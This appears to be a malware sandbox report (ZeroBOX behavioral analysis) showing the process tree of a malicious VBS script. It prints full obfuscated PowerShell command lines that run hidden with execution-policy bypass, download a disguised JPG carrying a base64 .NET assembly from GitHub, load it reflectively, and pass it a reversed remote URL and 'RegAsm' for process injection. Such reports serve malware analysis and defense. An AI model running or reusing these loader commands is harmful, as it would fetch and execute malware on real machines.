| ZeroBOX

Behavioral Analysis

Process tree

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\333343MPDW-constraints.vbs

    1932
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

      2148
      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}'+'imageUrl = {1}https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/'+'main/DetahNote_V.jpg {1};{0}webClient = New-O'+'bject System.Net.WebClient;{0}imageBytes = {0}webClient.DownloadData({0}imageUrl);{0}imageText = [System.Text.Encoding]::UTF8.GetString({0}imageBytes);{0}startFlag = {'+'1}<<BASE64_ST'+'ART>>{1};{0}endFlag = {1}<<BASE64_END>>{1};{0}startIn'+'dex = {0}imageText.Index'+'Of({0}startFlag);{0}endIndex = {0}imageTex'+'t.IndexOf({0}endFlag);{0}startIndex -ge 0 -and {0}endIndex -gt {0}start'+'Ind'+'ex;{0}startIndex += {0}startFlag.Length;{0}base64Length = {0}endIndex -'+' {0}startIndex;{0}base64Command = {0}imageText.Substring'+'({0}startIndex, {0}base64Length);{0}commandBytes = [System.Convert]::FromBase64St'+'ring'+'({0}base64Command);{0}loadedAssembly = [System.Reflection.Assembly]::Load({0}co'+'m'+'mandBytes);{0}vaiMethod = [dnlib.IO.Home].GetMethod({1}V'+'AI{1});{0}vaiMethod.Invoke({0}'+'null, @({1}txt.44446esabbbbbbewmadam/431.871.64.891//:ptth{'+'1}, {1}desativado{1}, {1}desativado{1}, {1}desativado{1}, {1}RegAsm{1},'+' {1}desativado{1}, {1}desativado{1}));') -f [cHAr]36,[cHAr]39) | .( $sHeLlId[1]+$shEllid[13]+'x')"

        2260
